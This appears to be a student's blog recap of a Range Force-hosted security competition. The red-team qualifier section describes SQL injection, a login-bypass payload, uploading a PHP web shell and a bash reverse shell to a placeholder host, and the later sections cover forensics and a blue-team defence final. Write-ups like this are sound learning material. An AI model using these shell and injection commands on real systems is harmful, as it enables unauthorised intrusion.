I am an 18 year old student interested in cyber security, robotics and physics.
You can find some of my projects and achievements on the right.
You can also find my blog page by clicking on my name
I was first introduced to this competition back when I was looking for another way to spend my time looking into and learning about the field of Cyber Security. The competition was advertised on the Cyber Security Challenge website. However, the challenge itself was designed and hosted by Range Force (who by the way make AMAZING challenges!).
Now that I've given credit where credit is due, I'll move on to the initial qualifier. The challenge was structured such that everyone had to take part in two timed 2-part challenges, given 8 hours to complete.
The initial challenge was a red-teaming exercise (attack centered security), where we were given a URL address to a box. A box is essentially a machine, in this case, it was public-facing to the internet. Instantly, I discovered that it served a website on port 443. So, continuing my enumeration, I started fuzzing the website and discovered an SQLi vulnerability in one of the search features. To exploit this I had to abuse union injections. After a while, I managed to attain the root user password hash and the root user username. This was extremely useful as the login page was also vulnerable, where I could inject the hash instead of the password; the check was similar to: ... where username="inputted username" AND password=sha1("inputted password")
This meant that I could overwrite the username section so that it read: ... where username="root_username" AND password="found_sha1";-- AND pasword=sha1("inputted password")
The part after -- is commented out so it gets ignored.
Thus, I could effectively login as the admin user. After this, there was another stage of enumeration, where I found another vulnerability. It was a File Upload Vulnerability, where you could upload arbitrary files and execute it on the webserver. The trick was it checked the integrity of files uploaded through the upload box, but the website also provided a remote upload path, which you can pass in the URL to a malicious file on your server (or GitHub) and gain a low privilege shell. So I provided the URL to the PHP p0wny shell and gained user privilege as www-data.
After this, I became stuck for a while, but realised I needed to get a TTY so I created a reverse shell, using bash -c "bash -i >& /dev/tcp/IP_ADDR/LISTENING_PORT 0>&1"
Privesc for a higher shell was very basic and straightforward, using python3 -c "import pty; pty.spawn('/bin/bash')" && sudo -i student I simply guessed the password to be student and it worked! Root privesc was even simpler! The student user was a SUDOER!! So simply do: sudo cat /root/root.txt
The next challenge was much simpler but more tedious. The two parts were: crawling a virtual disk image for malware and identifying them and peering through network traffic to answer questions.
A lot of the network traffic questions were basic to script and using tools such as grep, wireshark and tshark, provided on the RDP connection, I was easily able to solve the problems, which involved hashing files transferred across the connections. As curious as I was, I wondered if you could extract the files of the RDP connections and experimented with python's SimpleHTTPServer, but the bandwidth was limited and so the huge 5GB files would have taken up valuable time. If I was able to extract the files, I would have been able to run tools such as network miner to carve files faster.
The other portion took literally four mintutes, as I used the tool photorec, which recovered 3 binaries. Using virus total, I found out the types of malware and submitted a writeup.
The check-in was quite gracious, the rooms pretty spacious, but soon after we settled in they called us to board taxis, to the ice-breaker activity.
After the boring, obligatory talk, we proceeded with a familiarisation activity. Put into groups of around 6 strangers, we were given a quiz (luckily we had a boomer on our team, who had all the answers!). Overall, my temporary team ended up winning a brand new keyboard and mouse, which was pretty sweet!
The competition day began calmly, waking up and gathering in one of my newly made mate's room, to practice. After breakfast, we all began our journey to the final destination - the Santander headquarters.
Another briefing about the missions of today's challenge, it dawned on me that this was blue-teaming. Assigned into teams around 5 or 6, we set off to work.
There were API, Web, Router, Cloud servers that we had to keep alive and free from attacks. To do so, we had remote access to each server and were expected to secure the machine, with actions including firewall rules, monitoring cronjobs for any persistence of backdoors and much more.
The start of the event was very hectic, our team was very disorganized, yet we still managed to push our way to the top 3. Periodic attacks were launched by the Range Force team, which we had to defend. Attacks included DOS, backdoors and website vulnerability exploitation.
We thought it was all well and dandy until a surprise task was announced. A presentation was due by 1 o' clock. Oh no...
Lunch Time!
I decided to take charge over lunch and after some mouth-watering pizza, I gathered the team and started assigning roles according to each of our attributes. I took charge of the API and Router, as I became familiar with Linux hardening after participating and winning top 3 in Cyber Security Challenges' Cyber Centurion V.
Soon after, the leaderboard started shifting rapidly, other teams started catching up, the tense competition started creeping upon us. Each little fix shot us up to 1st and then we lost the position after each attack. The last 5 minutes quickly started catching up, as the top position changed at least 3 times a second.
As the competition came to a close, we secured a solid 2nd place. But what surprised me, even more, was the trophy awarded to me for being the 3rd best performing individual (especially as I was the highest-ranking competitor under the age of 21)!
